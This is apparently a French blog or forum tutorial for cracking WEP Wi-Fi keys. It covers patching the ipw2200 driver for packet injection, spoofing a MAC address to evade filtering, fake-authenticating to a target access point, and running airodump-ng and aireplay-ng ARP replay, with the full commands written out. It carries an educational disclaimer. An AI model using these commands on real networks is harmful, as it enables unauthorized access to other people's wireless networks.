Signez la pétition demandant le retrait de l'ordre du jour parlementaire du projet de loi DADVSI !
Déjà plus de signatures depuis le 2 décembre 2005 !
Les articles:
Crack cle Wep, ipw2200 et IBM T42
Je viens de passer la journée à faire des recherches pour parvenir à mon but, et je souhaite donc désormais vous faire bénéficier de mon expérience.
Comme d'habitude, avant toute chose, je vous rappelle qu'il est interdit de cracker un réseau WEP sans l'accord de son propriétaire. Ce tutoriel a un but purement éducatif. Il vous permettra de mettre ces connaissances en application lors de conférences par exemple, pour informer sur les risques d'utilisation du cryptage WEP. Je pense qu'il est important de communiquer sur ce sujet, et qu'un des moyens pour le faire, c'est de montrer concrètement avec qu'elle facilité c'est réalisable.
Le but ici est de pouvoir cracker un réseau protéger par une clé WEP, en utilisant l'injection de paquets.
Jusqu'à il y a peu de temps, l'injection de paquets n'était pas possible avec certaines cartes, ralentissant sérieusement le piratage de clés WEP. C'est désormais faisable pour les cartes utilisant le driver ipw2200, une preuve de plus que le cryptage WEP est à éviter à tout prix.
Je ne vais pas m'approfondir sur les subtilités de l'utilisation d'aircrack, ce n'est pas le but du sujet. Les sources d'informations sont nombreuses à ce sujet.
Ma carte :
02:02.0 Network controller: Intel Corporation PRO/Wireless 2915ABG Network Connection (rev 05)
Le chipset : IPW 2915
Le pilote : ipw2200
Voici les étapes nécessaires (je sépare en plusieurs lignes pour plus de lisibilité):
On installe les paquets nécessaires
sudo apt-get install linux-headers-`uname -r`
sudo apt-get install build-essential
Installation de la dernière version stable (0.8) de aircrack-ng :
(Vous pouvez vérifier s'il existe des versions plus récentes ici :
http://www.aircrack-ng.org/doku.php?id=install_aircrack )
wget http://download.aircrack-ng.org/aircrack-ng-0.8.tar.gz
tar -zxvf aircrack-ng-0.8.tar.gz
cd aircrack-ng-0.8
sudo make
sudo make install
N'oubliez pas de supprimer aircrack-ng-0.8.tar.gz et le dossier aircrack-ng-0.8 une fois que 'sudo make install' est terminé.
On télécharge ensuite la dernière version de ieee80211, ici :
http://ieee80211.sourceforge.net/downloads.php
J'ai pris :
http://prdownloads.sourceforge.net/ieee … z?download
On trouve ici les différents patchs pour aircrack-ng :
http://patches.aircrack-ng.org/
Il faut télécharger ipw2200-1.1.4-inject.patch, qui est un patch pour ipw2200.
Voici le lien direct :
http://patches.aircrack-ng.org/ipw2200- … ject.patch
Si vous trouvez une version supérieure, n'hésitez pas .
Il faut aussi télécharger ipw2200 bien sur, ici :
http://ipw2200.sourceforge.net/#downloads
ATTENTION : prenez la même version que la version du patch pour l'injection.
Dans le cas présent, il s'agit de :
http://prdownloads.sourceforge.net/ipw2 … z?download
C'est bon, on a tous les fichiers .
On met tout dans le même dossier, et on s'y place à coup de cd
tar zxvf ieee80211-1.2.17.tar.gz
cd ieee80211-1.2.17
sudo make
#'Tapez 'y' à chaque question
sudo make install
cd ..
tar zxvf ipw2200-1.1.4.tgz
patch -p0 < ipw2200-1.1.4-inject.patch
cd ipw2200-1.1.4
sudo ./remove-old
#Tapez 'y' à chaque question
sudo make
sudo make install
cd ..
Pour pouvoir commencer l'injection, il faut charger le module correspondant :
cd ipw2200-1.1.4
sudo rmmod ipw2200
sudo insmod ipw2200.ko rtap_iface=1
sudo ifconfig eth1 up
sudo ifconfig rtap0 up
ATTENTION : Si jamais la ligne 'sudo insmod ipw2200.ko rtap_iface=1' vous envoie l'erreur :
insmod: error inserting 'ipw2200.ko': -1 Unknown symbol in module
Pas de panique, il existe une solution , la voici :
cd ipw2200-1.1.4
gedit Makefile
Ensuite, dans le Makefile
#ifndef CONFIG_IPW2200 <--- commentez cette ligne
EXTERNAL_BUILD=y
......
CONFIG_IPW2200_PROMISCUOUS=y
#endif <----- commentez aussi cette ligne
On sauve, on ferme le fichier, puis :
sudo make
sudo make install
Et la, vous pouvez retenter de charger le module, normalement ça marche niquel.
Maintenant, ça ressemble beaucoup à tous les tutoriels aircrack, à quelques modifications près.
1) Toujours charger le module avant de commencer. Une fois la clé crackée, vous pouvez revenir au module normal ainsi :
rmmod ipw2200
modprobe ipw2200
Pour changer votre adresse MAC en cas de filtrage d'adresse MAC :
sudo ifconfig eth1 hw ether ADRESSE_MAC
Se connecter à l'AP (note : eth1 est mon interface wifi, regardez la votre avec iwconfig) :
(Il faut remplasser AP_ESSID par le nom du réseau visé)
sudo iwconfig eth1 essid AP_ESSID key FFFF-FFFF mode managed;
sleep 3;
sudo iwconfig eth1 key off;
Ouvrez un terminal à part, et tapez
watch -n1 "iwconfig eth1"
Dès que vous voyez le vous êtes déconnecté de l'AP, recommencez l'opération précédente.
On lance ensuite airodump, qui va permettre de récupérer les IVs, ce sont ces IVs qui permettent de trouver la clé :
Note : 6 est le channel du réseau visé, à vous de remplacer, (0 pour tous les channels).
nomFichier est le nom du fichier dans lequel les IVs sont enregistrés.
sudo airodump-ng --ivs -c 6 -w nomFichier -i rtap0;
Première adresse mac : celle de l'AP. La 2e : la votre.
Aireplay permet d'augmenter le trafic des IVs par injection. C'est pour le faire fonctionner qu'on a patché le module. Il lui faut pour cela chopper des ARP.
sudo aireplay-ng -3 -b AP_MAC_ADDRESS -h ETH1_MAC_ADDRESS -i rtap0 eth1
A partir d'un grand nombre d'IV, vous pouvez lancer aircrack-ng, avec nomFichier en paramètre. Je ne donne aucune précision à ce sujet, car c'est la partie qui pose le plus de problèmes d'ordre moral.
Mes sources :
http://forum.ubuntu-fr.org/viewtopic.php?id=97830
et
http://tinyshell.be/aircrackng/forum/in … ic=400.105
Voila voila, bonne journée à tous.
Je n'en fais pas un article Wiki, car même si ce tuto peut-être utile, il n'a pas sa place dans la partie officielle du site.
@++ à tous, j'espère avoir contribué à aider quelques personnes
N'hésitez pas à poster en cas de problème .
Piwaï